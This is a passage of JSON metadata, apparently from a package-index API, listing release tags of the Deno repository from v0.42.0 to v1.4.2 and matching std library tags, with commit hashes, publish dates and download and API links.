acb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21: